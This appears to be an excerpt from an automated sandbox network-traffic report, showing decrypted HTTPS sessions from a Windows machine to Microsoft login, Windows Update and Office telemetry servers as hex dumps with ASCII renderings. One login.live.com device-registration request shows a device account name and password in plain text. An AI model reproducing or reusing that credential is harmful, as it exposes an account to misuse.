                                                                                                                                            2024-10-31 16:12:46 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                            2024-10-31 16:12:46 UTC568INHTTP/1.1 200 OK
                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                            Expires: Thu, 31 Oct 2024 16:11:46 GMT
                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                            x-ms-route-info: C533_BL2
                                                                                                                                            x-ms-request-id: 98237590-1d2f-443b-8e72-0691aed886d4
                                                                                                                                            PPServer: PPV: 30 H: BL02EPF0001D6DC V: 0
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:45 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1276
                                                                                                                                            2024-10-31 16:12:46 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            8192.168.2.44976440.126.32.133443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:47 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                            Content-Length: 7642
                                                                                                                                            Host: login.live.com
                                                                                                                                            2024-10-31 16:12:47 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6f 69 64 66 66 63 70 75 78 6d 7a 6c 71 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 28 39 4f 65 5a 49 41 51 76 30 69 79 43 2b 49 23 54 25 73 76 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 61 6b 71 72 6c 66 67 75 6b 69 6a 65 76 6c 3c 2f 4f 6c 64 4d
                                                                                                                                            Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02voidffcpuxmzlq</Membername><Password>(9OeZIAQv0iyC+I#T%sv</Password></Authentication><OldMembername>02akqrlfgukijevl</OldM
                                                                                                                                            2024-10-31 16:12:56 UTC542INHTTP/1.1 200 OK
                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Expires: Thu, 31 Oct 2024 16:11:47 GMT
                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                            x-ms-route-info: C528_BL2
                                                                                                                                            x-ms-request-id: be388121-e33c-464b-ba13-190febf04225
                                                                                                                                            PPServer: PPV: 30 H: BL02EPF0001D901 V: 0
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:55 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 17166
                                                                                                                                            2024-10-31 16:12:56 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 30 30 31 31 32 45 33 42 39 38 33 37 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 65 34 66 65 38 36 64 32 2d 33 31 37 39 2d 34 32 38 66 2d 62 65 39 61 2d 33 61 39 32 63 30 36 37 38 32 64 32 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                            Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>001800112E3B9837</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="e4fe86d2-3179-428f-be9a-3a92c06782d2" LicenseID="3252b20c-d425-4711
                                                                                                                                            2024-10-31 16:12:56 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                            Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.44976520.109.210.53443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:56 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=34N3nfbc+uLWcc3&MD=GLsAeukB HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                            2024-10-31 16:12:57 UTC560INHTTP/1.1 200 OK
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Expires: -1
                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                            MS-CorrelationId: 7b26bd95-f8b2-4955-867b-f174d6465f64
                                                                                                                                            MS-RequestId: 7b68f939-e288-44f4-b411-7aac27ef76b7
                                                                                                                                            MS-CV: qQqDykl8o06hqJ88.0
                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:56 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 30005
                                                                                                                                            2024-10-31 16:12:57 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                            2024-10-31 16:12:57 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            10192.168.2.44976640.126.32.133443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:57 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                            Content-Length: 3592
                                                                                                                                            Host: login.live.com
                                                                                                                                            2024-10-31 16:12:57 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                            2024-10-31 16:12:58 UTC653INHTTP/1.1 200 OK
                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                            Expires: Thu, 31 Oct 2024 16:11:57 GMT
                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                            FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.5
                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                            x-ms-route-info: C504_BL2
                                                                                                                                            x-ms-request-id: 012ece0a-f009-44e1-a653-6d742642bf5b
                                                                                                                                            PPServer: PPV: 30 H: BL02EPF0001D702 V: 0
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:57 GMT
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 11392
                                                                                                                                            2024-10-31 16:12:58 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            11192.168.2.44976713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:58 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:12:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:58 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Content-Length: 218853
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public
                                                                                                                                            Last-Modified: Mon, 28 Oct 2024 13:23:36 GMT
                                                                                                                                            ETag: "0x8DCF753BAA1B278"
                                                                                                                                            x-ms-request-id: 93e60446-901e-00a0-4f32-2a6a6d000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161258Z-159b85dff8f9g9g4hC1DFW9n7000000001wg000000003se3
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:12:58 UTC15890INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                            2024-10-31 16:12:58 UTC16384INData Raw: 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                            Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <
                                                                                                                                            2024-10-31 16:12:59 UTC16384INData Raw: 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d
                                                                                                                                            Data Ascii: 0820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E=
                                                                                                                                            2024-10-31 16:12:59 UTC16384INData Raw: 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20
                                                                                                                                            Data Ascii: <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8"
                                                                                                                                            2024-10-31 16:12:59 UTC16384INData Raw: 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e
                                                                                                                                            Data Ascii: _False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
